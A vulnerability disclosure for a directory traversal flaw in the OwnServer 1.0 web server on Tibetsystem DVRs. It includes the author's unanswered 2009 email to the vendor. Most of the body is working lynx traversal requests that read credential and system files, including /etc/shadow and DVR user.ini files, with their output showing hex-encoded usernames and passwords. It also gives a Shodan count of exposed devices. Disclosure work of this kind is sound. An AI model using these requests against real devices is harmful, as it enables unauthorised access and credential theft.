Tibetsystem OwnServer 1.0 Directory Traversal



EKU-ID: 1461 CVE: OSVDB-ID:
Author: Jason Ellison Published: 2012-02-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


I tried to report this to the vendor in 2009.  SHODAN "OwnServer1.0":
Results 1 - 10 of about 11832 for OwnServer1.0 country:US.

-Jason Ellison

---------- Forwarded message ----------
From: Jason Ellison <infotek@gmail.com>
Date: Fri, Apr 10, 2009 at 5:02 PM
Subject: DVR Security Issue
To: sales@tibetsystem.com

Hello,

  I am a I.T. consultant in the U.S.  I have
discovered a security flaw in your product.  Please forward to the
appropriate person in your company (software engineer maybe?).

Tibetsystem DVR security issue:

Your Windows and Linux based DVR use the same webserver,
"OwnServer1.0"... This web server has a directory traversal
vulnerability that was discovered in 2004.  This can be used to get
the usernames and passwords of the DVR (or any local file).  The
usernames and passwords are Hex encoded ASCII.

In addition to this the webapp delivers the complete server config
including ALL valid usernames and passwords if you give proper
authentication.  So if I login using default anonymous:blank, all
accounts and passwords are delivered in clear text.

Is there an update for this issue?

$ lynx -source http://a.b.c.d/../../../../../../../home/dvr/sdvr/kdvr/user.ini
[@Sdvr]
validate=1

[user_time]
admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

[users]
admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF130000FFFF00000000000000000000000000000000000019
anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001A0000FFFFFF


$ lynx -source http://a.b.c.d/../../windows/dvr2.ini
[generic]
encoder=0
dual_streaming=1
[dfs3]
current_path=E:\dfs
recycle=1
retain=0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
record_path=F:\dfs;E:\dfs;
[Viewer]
run=C:\dvr\remote.exe,5.5.0.0
setup=C:\dvr\client\clientinstall.exe,5.5.0.0
[user_time]
admin=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
anonymous=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
[user32]
admin=61646D696E000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FF930000FFFF00000000000000000000000000000000000099
anonymous=616E6F6E796D6F75730000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0000FFFFFFFF130000001300000013000000130000003B


 lynx -source http://10.10.10.56/../../../../../../../etc/shadow
root:$1$q0HFBbpi$removed:13328:0:99999:7:::
bin:*:13328:0:99999:7:::
daemon:*:13328:0:99999:7:::
adm:*:13328:0:99999:7:::
lp:*:13328:0:99999:7:::
sync:*:13328:0:99999:7:::
shutdown:*:13328:0:99999:7:::
halt:*:13328:0:99999:7:::
mail:*:13328:0:99999:7:::
news:*:13328:0:99999:7:::
uucp:*:13328:0:99999:7:::
operator:*:13328:0:99999:7:::
games:*:13328:0:99999:7:::
nobody:*:13328:0:99999:7:::
rpm:!!:13328::::::
messagebus:!!:13328::::::
haldaemon:!!:13328::::::
vcsa:!!:13328::::::
xfs:!!:13328::::::
rpc:!!:13328::::::
rpcuser:!!:13328::::::
clamav:!!:13328::::::
sshd:!!:13328::::::
quess:$1$tpvrlLSt$removed:13328:0:99999:7:::


$ lynx -source http://a.b.c.d/../../boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home
Edition" /noexecute=optin /fastdetect


http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2004-01/0184.html
OwnServer 1.0 Directory Transversal Vulnerability

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/